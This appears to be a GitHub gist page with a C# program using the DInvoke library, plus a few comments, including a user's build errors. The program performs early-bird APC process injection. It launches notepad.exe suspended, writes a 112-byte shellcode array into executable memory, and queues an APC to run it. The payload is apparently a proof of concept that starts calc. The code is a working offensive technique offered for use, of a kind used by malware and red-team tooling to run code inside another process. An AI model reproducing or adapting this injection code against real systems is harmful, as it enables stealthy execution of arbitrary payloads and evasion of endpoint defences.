| using System; | |
| using System.Security.Principal; | |
| using System.Runtime.InteropServices; | |
| namespace DInvoke | |
| { | |
| class tests | |
| { | |
| public static void InjectNewProcessCreateUserAPC(String process) | |
| { | |
| byte[] sc = new byte[112] { | |
| 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3 | |
| }; | |
| uint oldProtect = 0; | |
| bool success = false; | |
| String processPath = process; | |
| Data.Win32.ProcessThreadsAPI.STARTF si = new Data.Win32.ProcessThreadsAPI.STARTF(); | |
| Data.Win32.ProcessThreadsAPI._PROCESS_INFORMATION pi = new Data.Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); | |
| success = DynamicInvoke.Win32.CreateProcess(processPath, null, IntPtr.Zero, IntPtr.Zero, false, Data.Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi); | |
| Console.WriteLine(pi.dwProcessId); | |
| IntPtr alloc = DynamicInvoke.Win32.VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)sc.Length, 0x1000 | 0x2000, 0x40); | |
| success = DynamicInvoke.Win32.WriteProcessMemory(pi.hProcess, alloc, sc, (uint)sc.Length, out UIntPtr bytesWritten); | |
| IntPtr tpointer = DynamicInvoke.Win32.OpenThread(Data.Win32.Kernel32.ThreadAccess.SetContext, false, (int)pi.dwThreadId); | |
| DynamicInvoke.Win32.VirtualProtectEx(pi.hProcess, alloc, sc.Length, 0x20, out oldProtect); | |
| DynamicInvoke.Win32.QueueUserAPC(alloc, tpointer, IntPtr.Zero); | |
| DynamicInvoke.Win32.ResumeThread(pi.hThread); | |
| } | |
| public static void Main(string[] args) | |
| { | |
| InjectNewProcessCreateUserAPC(@"C:\Windows\System32\notepad.exe"); | |
| } | |
| } | |
| } |
This comment has been minimized.
This comment has been minimized.
Hello there. This is perfectly normal. This was built with an unreleased version of DInvoke. |
This comment has been minimized.
hi when i try to build the solution i get these erros
Severity Code Description Project File Line Suppression State
Error CS0122 'Win32.ProcessThreadsAPI.STARTF' is inaccessible due to its protection level WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 18 Active
Error CS0122 'Win32.ProcessThreadsAPI.STARTF' is inaccessible due to its protection level WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 18 Active
Error CS0117 'Win32' does not contain a definition for 'CreateProcess' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 20 Active
Error CS0117 'Win32' does not contain a definition for 'VirtualAllocEx' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 23 Active
Error CS0117 'Win32' does not contain a definition for 'WriteProcessMemory' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 24 Active
Error CS0117 'Win32' does not contain a definition for 'OpenThread' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 27 Active
Error CS0117 'Win32' does not contain a definition for 'VirtualProtectEx' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 28 Active
Error CS0117 'Win32' does not contain a definition for 'QueueUserAPC' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 29 Active
Error CS0117 'Win32' does not contain a definition for 'ResumeThread' WindowsFormsApp11 C:\Users\AlienGamer\source\repos\WindowsFormsApp11\WindowsFormsApp11\Program.cs 30 Active